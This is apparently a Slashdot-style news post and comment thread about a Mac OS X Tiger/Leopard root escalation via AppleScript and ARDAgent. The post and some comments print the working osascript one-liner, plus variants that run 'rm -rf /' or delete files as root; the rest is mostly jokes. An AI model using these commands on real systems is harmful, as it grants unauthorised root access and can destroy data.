Mac OS X Root Escalation Through AppleScript
An anonymous reader writes "Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn't switched to via fast user switching. Secure? I think not." On the other hand, since this exploit seems to require physical access to the machine to be rooted, you might have some other security concerns to deal with at that point, like keeping the intruder from raiding your fridge on his way out.
who needs a source, it works. tried on my mac, output is: root
so i tried replacing "whoami" with "rm -rf /" and
!@#ca$a%H&(
+++NO CARRIER
More Twoson than Cupertino
My IQ is 162 and I didn't get your joke. Just how smart do you have to be to get that one?
Modding Trolls +1 inciteful since 1999
Is it really bad for an attacker to find out who I am using this "whoami" thingy?
Sarcasm does not make you more handsome or bring you favor with the ladies.
If you mod me Overrated, you are admitting that you have no penis.
Yeah, right.
Mac: Oh %$#& %$#& %$#& %$#&.
PC: I can relate.
Mac: No!! %$#& %$#& %$#&
PC: Don't feel so glum, Mac, it happens to everyone once in a while. Look at it this way -- it's a sign you're growing up.
Mac: NOOOOOOOOOOOOOOOOOOOOOOOOOO.
PC: You know, they can do wonderful things these days with firewall software.
Mac: I want to cut myself.
PC: Not a good idea as a root user, Mac.
Mac: *glowers*
PC: I only kid because I love you.
Help poke pirates in the eyepatch, arr.
Why use sudo when you could just use the ARDAgent hack instead?
osascript -e 'tell app "ARDAgent" to do shell script "gzip ARDAgent.app"';
Nononono....
it's: osascript -e 'tell app "ARDAgent" to do shell script "rm -rf ARDAgent.app"';